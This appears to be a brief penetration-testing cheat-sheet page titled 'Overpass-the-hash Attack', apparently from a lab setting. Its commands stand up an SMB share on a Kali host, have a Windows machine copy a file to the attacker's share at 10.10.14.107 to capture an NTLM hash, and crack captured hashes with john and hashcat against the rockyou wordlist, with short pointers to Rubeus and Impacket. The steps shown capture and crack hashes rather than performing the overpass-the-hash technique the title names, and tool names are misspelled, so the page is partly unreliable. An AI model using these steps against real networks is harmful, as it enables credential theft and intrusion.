Overpass-the-hash Attack
Using a NT hash to obtain Kerberos tickets
Methodology
# Kali
Kali> smbserver.py -smb2support smb .
# Windows
CMD> type null > hello.txt
CMD> copy hello.txt \\10.10.14.107\smb
# Kali
vi hashes.txt # and copy and past it
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# or
hashcat hashes.txt /usr/share/wordlists/rockyou.txt 
Kerberos Tickets
For current user without password, use Rebeus.
For user with password or NTLM hash, you could use Impact tools.
Last updated